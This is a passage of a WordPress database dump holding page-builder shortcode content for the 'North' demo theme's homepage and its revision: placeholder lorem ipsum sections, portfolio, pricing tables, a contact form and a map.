tabs=\"%5B%7B%22title%22%3A%22Movie%22%2C%22heading%22%3A%22Movie%22%2C%22text%22%3A%22Contrary%20to%20popular%20belief%2C%20Lorem%20Ipsum%20is%20not%20simply%20random%20text.%20It%20has%20roots%20in%20a%20piece%20of%20classical%20Latin%20literature%20from%2045%20BC%2C%20making%20it%20over%202000%20years%20old.%20Rich%20McClintock%20not%20simply.%20There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form.%22%7D%2C%7B%22title%22%3A%22Landing%22%2C%22heading%22%3A%22Landing%22%2C%22text%22%3A%22There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form%2C%20by%20injected%20humour%2C%20or%20randomised%20words%20which%20don%E2%80%99t%20look%20even%20snormally%20believable.%20If%20you%20are%20going%20to%20use%20a%20passage%20of%20Lorem%20Ipsum%2C%20you%20need%20to%20be%20sure%20there%20isn%E2%80%99t%20anything%20embarrassing%20hidden%20in%20the%20middle%20of%20text.%20All%20the%20Lorem%20Ipsum%20generators%20on%20the%20Internet%20tend%20to%20repeat%20predefined%20chunks%20as%20necessary%2C%20making%20this%20the%20first%20true%20generator%20on%20the%20Internet.%20It%20uses%20a%20dictionary%20of%20over%20200%20Latin%20words%2C%20combined%20with%20a%20handful%20of%20model%20sentence%20structures%2C%20to%20generate%20Lorem%20Ipsum%20which%20looks%20reasonable.%20The%20generated%20Lorem%20Ipsum%20is%20therefore%20always%20free%20from%20repetition%2C%20injected%20humour%2C%20or%20non-characteristic%20words%20etc.%22%7D%2C%7B%22title%22%3A%22Design%22%2C%22heading%22%3A%22Design%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%2C%7B%22title%22%3A%22Art%22%2C%22heading%22%3A%22Art%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%5D\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css_animation=\"left-to-right\"]\n<h1>PARALLAX WITH DEGRADE</h1>\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock not simply.\n\n[list icon=\"caret-right\" color=\"dark\" background=\"yes\"]\n\n[li]There are many variations of passages.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]Contrary to popular belief, Lorem Ipsum is not simply random text.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]But I must explain to you how all this mistaken idea<span style=\"color: #ffffff;\">.</span>[/li]\n\n[/list]\n\nSed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium dolorem que laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.\n\n[button label=\"Read More\" url=\"#\" color=\"black\"][/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"601\" css_animation=\"right-to-left\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" alignment=\"right\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"facts\"][vc_column width=\"1/1\"][special_heading title=\"WHAT OUR FUN FACTORS\" color=\"dark\" animated=\"yes\" margin_bottom=\"0\"][vc_row_inner][vc_column_inner width=\"1/4\"][counter title=\"Days Worked\" number=\"640\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Projects Finished\" number=\"1250\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Coffee Cups\" number=\"2040\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Pizza Ordered\" number=\"1620\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406483441587{border-top-width: 1px !important;padding-bottom: 20px !important;background-color: #fdfdfd !important;border-color: #eeeeee !important;border-style: solid !important;}\" el_id=\"works\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Portfolio\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old.\"][portfolio_grid filter=\"yes\" style=\"default\" cols=\"5\" thumb_size=\"square\" paged_posts=\"no\" cats=\"branding,design,photography,video\" thumb_style=\"alt\" fullwidth=\"no\" thumb_space=\"no\"][/vc_column][/vc_row][vc_row el_id=\"team\"][vc_column width=\"1/1\"][special_heading title=\"Our Creative Team\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][team_carousel posts_nr=\"6\"][/vc_column][/vc_row][vc_row el_id=\"features\" css=\".vc_custom_1405099363182{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][special_heading title=\"Features With Mobile\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical. There are many variations of passages of Lorem Ipsum available.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709800403{padding-top: 60px !important;}\"][icon_box title=\"Analystic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-camera-retro\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Web Design\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-cog\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"606\" alignment=\"center\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" css=\".vc_custom_1405099308623{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709805475{padding-top: 60px !important;}\"][icon_box title=\"Wordpress\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Graphic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-paper-plane-o\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406709814532{padding-top: 100px !important;padding-bottom: 100px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1408506142478{padding-top: 0px !important;background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][testimonials style=\"simple\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404037588724{padding-bottom: 70px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"What Clients Says\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][testimonials style=\"expanded\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404039027476{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #3a3a3a !important;}\"][vc_column width=\"1/1\"][logos_carousel images=\"568,566,567,563,564,565\" onclick=\"custom_link\" custom_links=\"#,#,#,#,#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"WHY DO YOU CHOOSE NORTH?\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1409773927619{padding-bottom: 80px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" el_id=\"what-we\"][vc_column width=\"1/2\"][vc_tabs][vc_tab title=\"Design\" tab_id=\"1403954748-1-96f2de-a384c686-9309\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\"><img class=\"alignleft size-full wp-image-926\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\" alt=\"mini-phone\" width=\"164\" height=\"116\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Company\" tab_id=\"1403954748-2-63f2de-a384c686-9309\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\"><img class=\"alignright size-full wp-image-927\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\" alt=\"mini-phone1\" width=\"130\" height=\"165\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Support\" tab_id=\"1405423831831-2-6c686-9309\"][vc_column_text]Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][/vc_tabs][/vc_column][vc_column width=\"1/2\"][vc_accordion][vc_accordion_tab title=\"Awesome Design\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Improved Documentation\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Clean Coded\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][/vc_accordion][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099662664{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" fullwidth=\"yes\" parallax=\"yes\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Featured Works\" color=\"dark\" animated=\"yes\" subtitle=\"CONTRARY TO POPULAR BELIEF, LOREM IPSUM IS NOT SIMPLY RANDOM TEXT. IT HAS ROOTS IN PIECE OF CLASSICAL. THERE ARE MANY VARIATIONS OF PASSAGES OF LOREM IPSUM AVAILABLE.\"][portfolio_carousel cats=\"branding,design,photography,video\" posts_nr=\"6\" thumb_style=\"alt\"][cta heading=\"super responsive, clean and creative theme\" subtitle=\"This is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum.\" button1_title=\"Our Portfolio\" button1_url=\"#works\" button2_title=\"Keep in Touch\" button2_url=\"#contact\" margin_bottom=\"0\" button1_subtitle=\"click for our all works\" button2_subtitle=\"send us a message\" style=\"centered\" button_color=\"white\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\"][vc_column width=\"1/1\"][special_heading title=\"Our Skills\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"55|Design,85|Wordpress,75|HTML&amp;CSS\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"70|Photography,75|Web Design,80|Photoshop\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099917341{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i41.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\" el_id=\"services\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"OUR SERVICES\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia.\"][services_carousel posts_nr=\"5\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099958560{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" darken=\"light\" bg_overlay=\"darker\" color_scheme=\"white\" el_id=\"prices\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Pricing Tables\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Starter\" price=\"$19\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"100\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Standard\" price=\"$39\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"300\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Professional\" price=\"$59\" period=\"per year\" featured=\"yes\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"500\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Platinum\" price=\"$79\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"700\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\"][vc_column width=\"1/1\"][special_heading title=\"Keep in Touch\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][vntd_contact_form email=\"prafgon@gmail.com\" label_name=\"Please enter your Name\" label_email=\"Please enter your E-Mail\" label_subject=\"Please enter your Subject\" label_message=\"Please enter your Message\" label_submit=\"Send E-Mail\" id=\"417\" animated=\"no\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405424323297{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" bg_overlay=\"darker\" el_id=\"contact\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][contact_block phone=\"0123 456 789\" address=\"NORTH, STREET NAME 6209, MELBOURNE AUSTRALIA\" email=\"SUPPORT@GOLDEYESTHEME.COM\" facebook=\"#\" twitter=\"#\" linkedin=\"#\" youtube=\"#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][gmap lat=\"41.862274\" long=\"-87.701328\" height=\"400\" zoom=\"15\" marker1_title=\"Office 1\" marker1_text=\"Your description goes here.\" marker1_location=\"custom\" marker1_location_custom=\"41.863774,-87.721328\" marker2_title=\"Our other store\" marker2_text=\"My secondary marker description.\" marker2_location=\"41.858774,-87.685328\"][/vc_column][/vc_row]','Home4','','inherit','closed','closed','','706-revision-v1','','','2014-07-15 12:22:04','2014-07-15 12:22:04','',706,'http://highperformingstudent.com/2014/07/15/706-revision-v1/',0,'revision','',0),(711,1,'2014-07-15 12:33:02','2014-07-15 12:33:02','[vc_row css=\".vc_custom_1405098881992{padding-top: 0px !important;padding-bottom: 0px !important;}\" el_id=\"first\" fullwidth=\"yes\" row_width=\"fullwidth\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][vntd_fullscreen_slider images=\"542,543,544\" text_static=\"The goods you need now\" style=\"style2\" posts_nr=\"6\" bg_overlay=\"dark1\" button1_label=\"Read more\" button1_url=\"#about\" animated=\"no\" text_dynamic=\"Welcome to North,We are Designers,We love to Design\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405422234264{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1f1f1f !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][cta button_title=\"Click me!\" button_url=\"http://\" button_color=\"dark\" button_color_custom=\"#5cbbf5\" text_align=\"left\" fullwidth=\"no\" subtitle=\"It is a long established fact that a reader will be distracted by the readable content of at its layout.\" button1_title=\"Purchase\" button1_url=\"#\" button2_title=\"Get Started\" button2_url=\"#about\" heading=\"Welcome to North!\" style=\"default\"]WELCOME TO NORTH![/cta][/vc_column][/vc_row][vc_row el_id=\"about\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"About North\" color=\"dark\" animated=\"yes\" margin_bottom=\"65\"]About North[/special_heading][vc_row_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Professional Design\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"300\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Retina Ready\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-comments-o\" animated=\"yes\" animation_delay=\"500\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"7x24 Support\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-life-ring\" animated=\"yes\" animation_delay=\"700\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Clean Coding\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-flask\" animated=\"yes\" animation_delay=\"900\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"what-we-do\" css=\".vc_custom_1405099060231{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"What we do\" color=\"white\" animated=\"yes\" margin_bottom=\"0\"]About North[/special_heading][north_tabs tabs=\"%5B%7B%22title%22%3A%22Movie%22%2C%22heading%22%3A%22Movie%22%2C%22text%22%3A%22Contrary%20to%20popular%20belief%2C%20Lorem%20Ipsum%20is%20not%20simply%20random%20text.%20It%20has%20roots%20in%20a%20piece%20of%20classical%20Latin%20literature%20from%2045%20BC%2C%20making%20it%20over%202000%20years%20old.%20Rich%20McClintock%20not%20simply.%20There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form.%22%7D%2C%7B%22title%22%3A%22Landing%22%2C%22heading%22%3A%22Landing%22%2C%22text%22%3A%22There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form%2C%20by%20injected%20humour%2C%20or%20randomised%20words%20which%20don%E2%80%99t%20look%20even%20snormally%20believable.%20If%20you%20are%20going%20to%20use%20a%20passage%20of%20Lorem%20Ipsum%2C%20you%20need%20to%20be%20sure%20there%20isn%E2%80%99t%20anything%20embarrassing%20hidden%20in%20the%20middle%20of%20text.%20All%20the%20Lorem%20Ipsum%20generators%20on%20the%20Internet%20tend%20to%20repeat%20predefined%20chunks%20as%20necessary%2C%20making%20this%20the%20first%20true%20generator%20on%20the%20Internet.%20It%20uses%20a%20dictionary%20of%20over%20200%20Latin%20words%2C%20combined%20with%20a%20handful%20of%20model%20sentence%20structures%2C%20to%20generate%20Lorem%20Ipsum%20which%20looks%20reasonable.%20The%20generated%20Lorem%20Ipsum%20is%20therefore%20always%20free%20from%20repetition%2C%20injected%20humour%2C%20or%20non-characteristic%20words%20etc.%22%7D%2C%7B%22title%22%3A%22Design%22%2C%22heading%22%3A%22Design%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%2C%7B%22title%22%3A%22Art%22%2C%22heading%22%3A%22Art%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%5D\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css_animation=\"left-to-right\"]\n<h1>PARALLAX WITH DEGRADE</h1>\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock not simply.\n\n[list icon=\"caret-right\" color=\"dark\" background=\"yes\"]\n\n[li]There are many variations of passages.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]Contrary to popular belief, Lorem Ipsum is not simply random text.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]But I must explain to you how all this mistaken idea<span style=\"color: #ffffff;\">.</span>[/li]\n\n[/list]\n\nSed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium dolorem que laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.\n\n[button label=\"Read More\" url=\"#\" color=\"black\"][/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"601\" css_animation=\"right-to-left\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" alignment=\"right\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"facts\"][vc_column width=\"1/1\"][special_heading title=\"WHAT OUR FUN FACTORS\" color=\"dark\" animated=\"yes\" margin_bottom=\"0\"][vc_row_inner][vc_column_inner width=\"1/4\"][counter title=\"Days Worked\" number=\"640\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Projects Finished\" number=\"1250\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Coffee Cups\" number=\"2040\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Pizza Ordered\" number=\"1620\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406483452381{border-top-width: 1px !important;border-bottom-width: 1px !important;padding-bottom: 50px !important;background-color: #fdfdfd !important;border-color: #eeeeee !important;border-style: solid !important;}\" el_id=\"works\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Portfolio\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old.\"][portfolio_grid filter=\"yes\" style=\"default\" cols=\"4\" thumb_size=\"square\" paged_posts=\"no\" cats=\"branding,design,photography,video\" thumb_style=\"alt\" more_url=\"http://veented.com/themes/north/portfolio/\" fullwidth=\"no\" thumb_space=\"yes\" posts_nr=\"9\"][/vc_column][/vc_row][vc_row el_id=\"team\"][vc_column width=\"1/1\"][special_heading title=\"Our Creative Team\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][team_carousel posts_nr=\"6\"][/vc_column][/vc_row][vc_row el_id=\"features\" css=\".vc_custom_1405099363182{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][special_heading title=\"Features With Mobile\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical. There are many variations of passages of Lorem Ipsum available.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709900735{padding-top: 60px !important;}\"][icon_box title=\"Analystic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-camera-retro\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Web Design\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-cog\" 